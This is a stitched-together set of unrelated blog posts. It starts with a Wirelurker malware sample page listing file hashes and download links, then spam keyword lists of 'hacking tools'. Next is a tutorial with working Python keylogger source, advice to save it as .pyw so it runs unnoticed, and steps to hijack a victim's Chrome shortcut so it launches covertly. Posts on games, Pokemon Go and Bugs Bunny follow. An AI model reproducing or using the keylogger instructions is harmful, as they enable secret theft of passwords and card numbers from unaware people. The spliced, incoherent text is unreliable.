Wirelurker For OSX, iOS (Part I) And Windows (Part II) Samples

PART II

Wirelurker for Windows (WinLurker)

Research: Palo Alto Claud Xiao: Wirelurker for Windows

Sample credit: Claud Xiao

PART I

Research: Palo Alto Claud Xiao WIRELURKER: A New Era in iOS and OS X Malware

Palo Alto |Claud Xiao - blog post Wirelurker

Wirelurker Detector https://github.com/PaloAltoNetworks-BD/WireLurkerDetector

Sample credit: Claud Xiao

Download

Download Part I
Download Part II

Email me if you need the password

List of files

List of hashes 

Part II

s+«sìÜ 3.4.1.dmg 925cc497f207ec4dbcf8198a1b785dbd

apps.ipa 54d27da968c05d463ad3168285ec6097
WhatsAppMessenger 2.11.7.exe eca91fa7e7350a4d2880d341866adf35
使用说明.txt 3506a0c0199ed747b699ade765c0d0f8
libxml2.dll c86bebc3d50d7964378c15b27b1c2caa
libiconv-2_.dll 9c8170dc4a33631881120a467dc3e8f7
msvcr100.dll bf38660a9125935658cfa3e53fdc7d65
libz_.dll bd3d1f0a3eff8c4dd1e993f57185be75
mfc100u.dll f841f32ad816dbf130f10d86fab99b1a

zlib1.dll c7d4d685a0af2a09cbc21cb474358595

│   apps.ipa
│   σ╛«σìÜ 3.4.1.dmg
│
└───WhatsAppMessenger 2.11.7
            libiconv-2_.dll
            libxml2.dll
            libz_.dll
            mfc100u.dll
            msvcr100.dll
            WhatsAppMessenger 2.11.7.exe
            zlib1.dll
            使用说明.txt


Part I

BikeBaron 15e8728b410bfffde8d54651a6efd162
CleanApp c9841e34da270d94b35ae3f724160d5e
com.apple.MailServiceAgentHelper dca13b4ff64bcd6876c13bbb4a22f450
com.apple.appstore.PluginHelper c4264b9607a68de8b9bbbe30436f5f28
com.apple.appstore.plughelper.plist 94a933c449948514a3ce634663f9ccf8
com.apple.globalupdate.plist f92640bed6078075b508c9ffaa7f0a78
com.apple.globalupdate.plist f92640bed6078075b508c9ffaa7f0a78
com.apple.itunesupdate.plist 83317c311caa225b17ac14d3d504387d
com.apple.machook_damon.plist 6507f0c41663f6d08f497ab41893d8d9
com.apple.machook_damon.plist 6507f0c41663f6d08f497ab41893d8d9
com.apple.MailServiceAgentHelper.plist e6e6a7845b4e00806da7d5e264eed72b
com.apple.periodic-dd-mm-yy.plist bda470f4568dae8cb12344a346a181d9
com.apple.systemkeychain-helper.plist fd7b1215f03ed1221065ee4508d41de3
com.apple.watchproc.plist af772d9cca45a13ca323f90e7d874c2c
FontMap1.cfg 204b4836a9944d0f19d6df8af3c009d5
foundation 0ff51cd5fe0f88f02213d6612b007a45
globalupdate 9037cf29ed485dae11e22955724a00e7
globalupdate 9037cf29ed485dae11e22955724a00e7
itunesupdate a8dfbd54da805d3c52afc521ab7b354b
libcrypto.1.0.0.dylib 4c5384d667215098badb4e850890127b
libcrypto.1.0.0.dylib 3b533eeb80ee14191893e9a73c017445
libiconv.2.dylib 94f9882f5db1883e7295b44c440eb44c
libiconv.2.dylib fac8ef9dabdb92806ea9b1fde43ad746
libimobiledevice.4.dylib c596adb32c143430240abbf5aff02bc0
libimobiledevice.4.dylib 5b0412e19ec0af5ce375b8ab5a0bc5db
libiodb.dylib bc3aa0142fb15ea65de7833d65a70e36
liblzma.5.dylib 5bdfd2a20123e0893ef59bd813b24105
liblzma.5.dylib 9ebf9c0d25e418c8d0bed2a335aac8bf
libplist.2.dylib 903cbde833c91b197283698b2400fc9b
libplist.2.dylib 109a09389abef9a9388de08f7021b4cf
libssl.1.0.0.dylib 49b937c9ff30a68a0f663828be7ea704
libssl.1.0.0.dylib ab09435c0358b102a5d08f34aae3c244
libusbmuxd.2.dylib e8e0663c7c9d843e0030b15e59eb6f52
libusbmuxd.2.dylib 9efb552097cf4a408ea3bab4aa2bc957
libxml2.2.dylib 34f14463f28d11bd0299f0d7a3985718
libxml2.2.dylib 95506f9240efb416443fcd6d82a024b9
libz.1.dylib 28ef588ba7919f751ae40719cf5cffc6
libz.1.dylib f2b19c7a58e303f0a159a44d08c6df63
libzip.2.dylib 2a42736c8eae3a4915bced2c6df50397
machook 5b43df4fac4cac52412126a6c604853c
machook ecb429951985837513fdf854e49d0682
periodicdate aa6fe189baa355a65e6aafac1e765f41
pphelper 2b79534f22a89f73d4bb45848659b59b
sfbase.dylib bc3aa0142fb15ea65de7833d65a70e36

sfbase.dylib bc3aa0142fb15ea65de7833d65a70e36
sfbase_v4000.dylib 582fcd682f0f520e95af1d0713639864
sfbase_v4001.dylib e40de392c613cd2f9e1e93c6ffd05246
start e3a61139735301b866d8d109d715f102
start e3a61139735301b866d8d109d715f102
start.sh 3fa4e5fec53dfc9fc88ced651aa858c6
stty5.11.pl dea26a823839b1b3a810d5e731d76aa2
stty5.11.pl dea26a823839b1b3a810d5e731d76aa2
systemkeychain-helper e03402006332a6e17c36e569178d2097
watch.sh 358c48414219fdbbbbcff90c97295dff
WatchProc a72fdbacfd5be14631437d0ab21ff960
7b9e685e89b8c7e11f554b05cdd6819a 7b9e685e89b8c7e11f554b05cdd6819a
update 93658b52b0f538c4f3e17fdf3860778c
start.sh 9adfd4344092826ca39bbc441a9eb96f

File listing

├───databases

│       foundation

│

├───dropped

│   ├───version_A

│   │   │   com.apple.globalupdate.plist

│   │   │   com.apple.machook_damon.plist

│   │   │   globalupdate

│   │   │   machook

│   │   │   sfbase.dylib

│   │   │   watch.sh

│   │   │

│   │   ├───dylib

│   │   │       libcrypto.1.0.0.dylib

│   │   │       libiconv.2.dylib

│   │   │       libimobiledevice.4.dylib

│   │   │       liblzma.5.dylib

│   │   │       libplist.2.dylib

│   │   │       libssl.1.0.0.dylib

│   │   │       libusbmuxd.2.dylib

│   │   │       libxml2.2.dylib

│   │   │       libz.1.dylib

│   │   │

│   │   ├───log

│   │   └───update

│   ├───version_B

│   │       com.apple.globalupdate.plist

│   │       com.apple.itunesupdate.plist

│   │       com.apple.machook_damon.plist

│   │       com.apple.watchproc.plist

│   │       globalupdate

│   │       itunesupdate

│   │       machook

│   │       start

│   │       WatchProc

│   │

│   └───version_C

│       │   com.apple.appstore.plughelper.plist

│       │   com.apple.appstore.PluginHelper

│       │   com.apple.MailServiceAgentHelper

│       │   com.apple.MailServiceAgentHelper.plist

│       │   com.apple.periodic-dd-mm-yy.plist

│       │   com.apple.systemkeychain-helper.plist

│       │   periodicdate

│       │   stty5.11.pl

│       │   systemkeychain-helper

│       │

│       └───manpath.d

│               libcrypto.1.0.0.dylib

│               libiconv.2.dylib

│               libimobiledevice.4.dylib

│               libiodb.dylib

│               liblzma.5.dylib

│               libplist.2.dylib

│               libssl.1.0.0.dylib

│               libusbmuxd.2.dylib

│               libxml2.2.dylib

│               libz.1.dylib

│               libzip.2.dylib

│

├───iOS

│       sfbase.dylib

│       sfbase_v4000.dylib

│       sfbase_v4001.dylib

│       start

│       stty5.11.pl

│

├───IPAs

│       7b9e685e89b8c7e11f554b05cdd6819a

│       pphelper

│

├───original

│       BikeBaron

│       CleanApp

│       FontMap1.cfg

│       start.sh

│

└───update

        start.sh

        update

Related word

• Hack App
• Pentest Tools Subdomain
• Hacker Tools Hardware
• Hack Tools For Windows
• Best Pentesting Tools 2018
• Pentest Tools Linux
• Pentest Tools Kali Linux
• Ethical Hacker Tools
• Wifi Hacker Tools For Windows
• Hacking Tools Windows 10
• Free Pentest Tools For Windows
• Underground Hacker Sites
• Hacking App
• Pentest Tools Windows
• Best Hacking Tools 2019
• Hacking Tools Windows
• Hacker Tools Software
• Hacking Tools For Pc
• Hack Tools Mac
• Pentest Tools Subdomain
• Pentest Tools Review
• Hack Tools 2019
• Growth Hacker Tools
• How To Make Hacking Tools
• Hacker Tools Software
• Hacker Tools Mac
• Tools 4 Hack

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.

Requirements to create a python keylogger

• Computer With Operating system: Windows, Mac os or Linux
• Python must be installed on the system
• Pip (Python index package ) you will need this to install python software packages.
• Pypiwin32 and PyHook packages
• Basic understanding of computers

You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.

Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:

Download python development kit by clicking here.

Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.

Step 2:

Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.

Step 3:

You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.

To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.

Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.

Now click on the Advanced system settings

Choose Environment Variables.

Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts

Click on ok.

Part 2: Installing Pypiwin32 and PyHook python Packages using pip:

Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.

Part 3: Creating and testing the python keylogger:

Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.

Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.

import pyHook, pythoncom, sys, logging

file_log='F:\\test\\log.txt'

def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True

hooks_manager=pyHook.HookManager()

hooks_manager.KeyDown=onKeyboardEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.

The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.

Let's make the python keylogger auto-launchable by attaching it the Google Chrome.

Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat

Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.

Read more

• Hak5 Tools
• Pentest Box Tools Download
• Pentest Tools Apk
• Hack Tools
• Pentest Tools Alternative
• Pentest Tools Apk
• Hacker Tools Apk
• Pentest Tools For Windows
• Hacker Tools For Ios
• Hack Tools For Pc
• Bluetooth Hacking Tools Kali
• Pentest Tools Free
• Hack Tools
• Pentest Tools Review
• Pentest Reporting Tools
• Pentest Tools Bluekeep
• Hacking Tools Usb
• Hacking Tools Mac
• Hacker Tools Online
• Blackhat Hacker Tools
• Pentest Automation Tools
• Nsa Hack Tools Download
• Tools 4 Hack
• Computer Hacker
• Blackhat Hacker Tools

SuperStarfighter, A Local Multiplayer Game Made With Godot

Looks like FOSS game development with Godot is a breeze :)

SuperStarfighter is a fast-paced local party game for up to 4 players. Outmaneuver and shoot your opponents in a 2d top-down arena, and become an intergalactic champion!

Get it on Itch.io or find the source code here.

Hat-tip to GoL.

For commenting please visit our forums.

This post was retrieved from freegamer.blogspot.com.

Pokemon Go Adding New Deoxys Form This Week

Pokemon Go Adding New Deoxys Form This Week

The Mythical Psychic Pokemon Deoxys made its debut in Pokemon Go earlier this year as the game's second EX Raid boss, replacing Mewtwo. Up until now, the DNA Pokemon has only appeared in the mobile game in its Normal Forme, but a new variant of the Pokemon is set to arrive soon.

Developer Niantic has announced that Attack Forme Deoxys will be available in EX Raids later this month. Along with taking on a different appearance, Attack Forme Deoxys has a much higher attack stat than its standard form, and Niantic warns that it will be a "difficult challenge that requires Trainers to take advantage of every opportunity."

The new form of Deoxys is set to arrive with the next cycle of EX Raid invites, which are scheduled to go out beginning December 20. Unlike standard Raid Battles, you can only participate in EX Raids if you've received an invitation. In order to get one, you'll first need to have recently won a Raid Battle at a "qualifying" Gym. These are denoted by an EX Raid tag in the upper righthand corner when you look at the Gym's details.

In the meantime, players still have a little more time to catch Pokemon Go's latest Legendary, Cresselia. The Psychic Pokemon is scheduled to leave standard Raid Battles on December 18, just before Attack Forme Deoxys is set to arrive in EX Raids. Niantic hasn't announced when the game's next Legendary Pokemon will arrive, although the developer has teased that Azelf, Uxie, and Mesprit--three more Legendaries originally from Pokemon Diamond and Pearl--are on the way.

Pokemon Go's annual holiday celebration  is also set to return again soon. This year's event kicks off on December 18 and will introduce another handful of Gen 4 Pokemon, including Snorlax's pre-evolved form, Munchlax, as well as Snover, Abomasnow, and Croagunk. Festive hat Pikachu and Delibird will also return, and different bonuses will be meted out throughout the event until it ends on January 2.

Meanwhile, On The Table Top....

These days my body demands a break from the painting desk more often than it once did. There was work to be done but....

c

The heroes of the day: two companies of the Victoria Rifles which were posted in a wood were attacked by three Rebel companies and saw them off by the skin of their teeth. 

So, just a quick, simple, encounter over randomly generated terrain. Looked like a walk over until near the end  when the Rebel General woke up and it became close.

Back to painting on Saturday.

Here's To Lookin' At You, Bugs!

Image used for criticism under "Fair Use." All rights belong to Warner Brothers.

"What's up, Doc?"

Bugs Bunny was one of the great idols of my childhood. Looney Tunes used to regularly come on Cartoon Network, and Bugs was the one I always wanted most to see. In fact, Cartoon Network used to dedicate the entire month of June to playing Bugs Bunny cartoons nonstop. Such a bold move could hardly be imagined today. Even more inconceivable were his appearances at that time beside Michael Jordan in Space Jam, and Mickey Mouse in Who Framed Roger Rabbit. The latter more productive than the former.



I speak of Bugs since he just turned seventy-five this year. In the few moments I've spent with him, eyes glued to the TV set, so many are fond. Who wouldn't adore his arguments with Daffy over whether it was "Rabbit Season" or "Duck Season"? We all know the routine. Bugs would concede that it's "Rabbit Season", but Daffy, not one to agree with Bugs, thoughtlessly insists that its "Duck Season", only to get his bill shot off by Elmer. Though Bugs hardly ever got on Elmer's good side, either. As much as he tried to be very, very quiet in his hunting for rabbits, Bugs usually got the upper-hand. Sometimes he did it by cross-dressing as a woman, most famously in What's Opera, Doc? Now remembered as one of Bugs and Elmer's finest, What's Opera, Doc? is a fanciful adaptation of Wagner's Der Ring des Nibelungen, with the "Tannhauser Chorus" and "Ride of the Valkyries" included. The short was produced in the 1950's, when the Chuck Jones cartoons acquired a more modernist art style. We see this on point when Elmer's fury to command the weather gets the background into more clashing hues and greys. What stands out about this particular episode is that Elmer actually succeeds in killing Bugs, to which he weeps. I was shocked upon first seeing this. Tom never caught Jerry. Sylvester never caught Tweety. Wile E. Coyote never caught Road Runner. Yet here we were. Though Bugs slipped in a final comment to berate my surprise, "What did you expect from an opera, a happy ending?"

Even when Bugs was shamelessly ripping off Tom and Jerry's Cat Concerto in Rhapsody Rabbit, he managed to get a good laugh or two in. I mean hell, he literally pulls out a gun to shoot a coughing audience member. I suppose a bullet does better to silence than cough drops.

Bugs had wit. I'd argue that's part of his draw. With so many one-liners, Bugs comes across as an animated Groucho Marx. (Bugs has even put on a Groucho disguise). The rabbit always used his brains to get the upper-hand over his opponents, and being a cartoon, he resolves matters in ways that may surprise the viewer. Compare this to Popeye the Sailor, whom while being entertaining in his own right, always ended his conflicts in the same way: with spinach and muscle. Though the type of character Bugs is comes from the Trickster archetype. NPR compared him favorably to Puck, Anansi, and the Monkey King. Further, the radio station quoted Robert Thompson, who directs a pop-culture studies program at Syracuse University. Thompson remarked of Bugs that, "He defies authority. He goes against the rules. But he does it in a way that's often lovable, and that often results in good things for the culture at large," (Sutherland). Chuck Jones, always made sure that Bugs only acted when provoked. His trickery was a matter of defending his dignity.

And to my recollection, he always won.

Image used for criticism under "Fair Use." All rights belong to Warner Bros.

Bibliography

Sutherland, J.J. "Bugs Bunny: The Trickster, American Style." NPR, January 6, 2008. Web. http://www.npr.org/templates/story/story.php?storyId=17874931

TOP 10 MOVIES OF 2019

The new year is here, and so Top 10 season is upon us. The tradition is to rank media in a seemingly arbitrary fashion so here's my oh-so personal list of moves faves that came out 2019. What will be number 1? Read on to find out...

Read more »